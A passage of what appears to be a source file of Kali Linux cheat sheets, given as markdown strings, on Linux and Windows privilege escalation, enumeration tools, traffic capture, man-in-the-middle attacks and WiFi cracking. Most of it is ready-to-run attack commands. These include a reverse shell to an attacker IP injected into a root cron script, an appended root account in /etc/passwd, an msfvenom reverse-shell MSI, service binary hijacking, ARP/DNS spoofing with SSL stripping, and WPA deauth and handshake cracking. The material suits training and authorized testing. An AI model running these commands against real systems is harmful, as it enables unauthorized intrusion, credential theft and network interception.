# sudo (ALL) NOPASSWD: /usr/bin/env → sudo env /bin/bash
\`\`\`

### Cron Jobs

\`\`\`bash
# System crontabs
cat /etc/crontab
ls -la /etc/cron.*

# User crontabs
crontab -l

# Look for writable scripts in cron
# If a cron runs a writable script as root → inject reverse shell
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' >> /opt/backup.sh
\`\`\`

### Writable /etc/passwd

\`\`\`bash
# Generate password hash
openssl passwd -1 -salt hacker password123

# Add root user
echo 'hacker:$1$hacker$...:0:0::/root:/bin/bash' >> /etc/passwd
\`\`\`

### Kernel Exploits

\`\`\`bash
# Check kernel version
uname -r

# Search for exploits
searchsploit linux kernel ubuntu local privilege escalation

# Common: DirtyCow, DirtyPipe, PwnKit
\`\`\``,

"kali-linpeas-automation": `## LinPEAS & Linux Smart Enumeration

### Running LinPEAS

\`\`\`bash
# Transfer to target
# On attacker:
python3 -m http.server 8000

# On target:
wget http://10.10.14.1:8000/linpeas.sh
chmod +x linpeas.sh

# Run with output to file
./linpeas.sh | tee linpeas_output.txt

# Run specific checks only
./linpeas.sh -a  # All checks
./linpeas.sh -s  # Superfast (only critical)
\`\`\`

### Reading LinPEAS Output

Color coding:
- 🔴 **RED/YELLOW** — 95% chance of privesc vector
- 🟡 **RED** — High confidence finding
- 🟢 **GREEN** — Interesting but needs manual verification
- 🔵 **BLUE** — Informational

### Key Sections to Check

1. **System Information** — Kernel version, sudo version
2. **Available Software** — Installed compilers, interpreters
3. **Processes** — What's running as root
4. **Cron Jobs** — Scheduled tasks
5. **SUID** — Exploitable binaries
6. **Capabilities** — Files with special caps
7. **Writable Paths** — Files/dirs you can modify
8. **Passwords** — Config files with creds

### Linux Smart Enumeration (Alternative)

\`\`\`bash
# Download and run
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh

# Levels: 0=info, 1=interesting, 2=all
./lse.sh -l 1
\`\`\``,

"kali-windows-privesc": `## Windows Privilege Escalation Techniques

### Initial Enumeration

\`\`\`cmd
whoami
whoami /priv
whoami /groups
net user
net localgroup administrators
systeminfo
hostname
\`\`\`

### Token Impersonation (SeImpersonatePrivilege)

\`\`\`bash
# Check for SeImpersonatePrivilege
whoami /priv

# JuicyPotato (older Windows)
JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\temp\\shell.exe" -t *

# PrintSpoofer (Windows 10/Server 2019)
PrintSpoofer.exe -i -c cmd

# GodPotato (latest)
GodPotato.exe -cmd "cmd /c whoami"
\`\`\`

### Service Misconfigurations

\`\`\`cmd
# Find modifiable services
sc qc ServiceName
accesschk.exe /accepteula -uwcv "Authenticated Users" *

# Unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\\Windows\\\\"

# Weak service permissions — change binary path
sc config VulnService binpath="C:\\temp\\shell.exe"
sc stop VulnService
sc start VulnService
\`\`\`

### AlwaysInstallElevated

\`\`\`cmd
# Check if enabled
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

# If both = 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f msi -o evil.msi
# On target:
msiexec /quiet /qn /i evil.msi
\`\`\`

### Scheduled Tasks

\`\`\`cmd
# List scheduled tasks
schtasks /query /fo LIST /v

# Check for writable task binaries
icacls "C:\\path\\to\\task\\binary.exe"
\`\`\``,

"kali-winpeas-powerup": `## WinPEAS & PowerUp Automation

### WinPEAS

\`\`\`cmd
# Transfer and run
certutil -urlcache -f http://10.10.14.1:8000/winPEASx64.exe winpeas.exe
winpeas.exe

# Specific checks
winpeas.exe quiet servicesinfo
winpeas.exe quiet filesinfo
winpeas.exe quiet userinfo
\`\`\`

### PowerUp (PowerShell)

\`\`\`powershell
# Import
Import-Module .\\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Specific checks
Get-UnquotedService
Get-ModifiableService
Get-ServiceDetail -Name VulnService

# Auto-exploit a service
Invoke-ServiceAbuse -Name VulnService -UserName "admin" -Password "password"
\`\`\`

### Seatbelt (C# Enumeration)

\`\`\`cmd
# Run common checks
Seatbelt.exe -group=all

# Specific modules
Seatbelt.exe TokenPrivileges MappedDrives ScheduledTasks
\`\`\``,

"kali-wireshark-tcpdump": `## Wireshark & tcpdump — Traffic Analysis

### Wireshark Display Filters

\`\`\`
# HTTP traffic
http
http.request.method == "POST"
http.request.uri contains "login"

# DNS
dns
dns.qry.name contains "suspicious"

# TCP
tcp.port == 4444
tcp.flags.syn == 1 && tcp.flags.ack == 0

# IP filtering
ip.addr == 10.10.10.1
ip.src == 10.10.10.1 && ip.dst == 10.10.10.2

# Follow TCP stream
# Right-click packet → Follow → TCP Stream

# Find credentials
http.request.method == "POST" && frame contains "password"
ftp.request.command == "PASS"
\`\`\`

### tcpdump

\`\`\`bash
# Capture on interface
sudo tcpdump -i eth0

# Filter by host
sudo tcpdump -i eth0 host 10.10.10.1

# Filter by port
sudo tcpdump -i eth0 port 80

# DNS only
sudo tcpdump -i eth0 port 53

# Save to file
sudo tcpdump -i eth0 -w capture.pcap

# Read pcap
tcpdump -r capture.pcap

# Verbose with ASCII
sudo tcpdump -i eth0 -A port 80

# Hex dump
sudo tcpdump -i eth0 -XX port 21

# Capture N packets
sudo tcpdump -i eth0 -c 100

# Filter expressions
sudo tcpdump -i eth0 'src 10.10.10.1 and dst port 443'
sudo tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'
\`\`\``,

"kali-mitm-attacks": `## Man-in-the-Middle Attacks

### ARP Spoofing

\`\`\`bash
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof (dsniff package)
sudo arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP
sudo arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP

# Then sniff traffic
sudo tcpdump -i eth0 -A host VICTIM_IP
\`\`\`

### Bettercap

\`\`\`bash
# Start bettercap
sudo bettercap -iface eth0

# Network discovery
> net.probe on
> net.show

# ARP spoof + sniff
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on

# SSL stripping
> set http.proxy.sslstrip true
> http.proxy on
> arp.spoof on

# DNS spoofing
> set dns.spoof.domains target.com
> set dns.spoof.address YOUR_IP
> dns.spoof on
\`\`\`

### mitmproxy

\`\`\`bash
# Start proxy
mitmproxy -p 8080

# Transparent mode
mitmproxy --mode transparent -p 8080

# Script injection
mitmproxy -s inject.py
\`\`\``,

"kali-wifi-cracking": `## WiFi Hacking with Aircrack-ng

### Monitor Mode Setup

\`\`\`bash
# Check wireless interfaces
iwconfig
airmon-ng

# Kill conflicting processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates wlan0mon
\`\`\`

### Capture WPA2 Handshake

\`\`\`bash
# Scan for networks
sudo airodump-ng wlan0mon

# Target specific network (capture to file)
sudo airodump-ng -c CHANNEL --bssid AP_MAC -w capture wlan0mon

# Force deauth to capture handshake
sudo aireplay-ng -0 5 -a AP_MAC -c CLIENT_MAC wlan0mon

# Look for "WPA handshake: XX:XX:XX" in airodump
\`\`\`

### Crack the Handshake

\`\`\`bash
# With aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Convert for hashcat (faster GPU cracking)
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
\`\`\`

### WPS Attack

\`\`\`bash
# Check for WPS-enabled networks
wash -i wlan0mon

# Reaver WPS brute-force
reaver -i wlan0mon -b AP_MAC -vv

# Bully (alternative)
bully wlan0mon -b AP_MAC -c CHANNEL
\`\`\`

### Post-Attack Cleanup

\`\`\`bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart network manager
sudo systemctl restart NetworkManager
\`\`\``,

};


